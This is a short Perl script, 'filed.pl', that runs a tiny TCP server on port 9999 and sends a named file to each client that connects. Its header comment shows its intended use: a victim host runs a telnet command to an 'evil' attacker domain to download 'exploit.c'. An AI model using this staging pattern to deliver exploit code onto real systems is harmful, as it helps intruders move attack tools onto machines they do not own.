#!/usr/bin/perl

# ---- filed.pl
# tiny file server.
# this outputs plain-text file to client, then closes the session.
# ex.) owned# ./filed.pl exploit.c
#      ...
#      victim$ telnet owned.evil.co.jp 9999 > exploit.c
#      (don't forget to remove head 3 lines!)
# 
# greets to Mixter for this idea.
# 					White_E <white_e@iname.com>
# 					http://ttj.virtualave.net/

$port = 9999;
$file = $ARGV[0] || die "usage: $0 <file>\n";

use Socket;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
select(S);$|=1;select(STDOUT);
$sv_addr = sockaddr_in($port,INADDR_ANY);
bind(S,$sv_addr)    || die "ERR: bind()\n";
listen(S,SOMAXCONN) || die "ERR: listen()\n";
print "---- $0 started on $port.\n";
print "---- File: $file.\n";

for (;$cl=accept(C,S);close(C)) {
  ($cl_port,$cl_addr) = sockaddr_in($cl);
  $cl_host = inet_ntoa($cl_addr);
  print "**** connected from $cl_host:$cl_port.\n";
  open(F,$file) || die "ERR: open()\n";
  while (<F>) { print C $_; }
  close(F);
  close(C);
}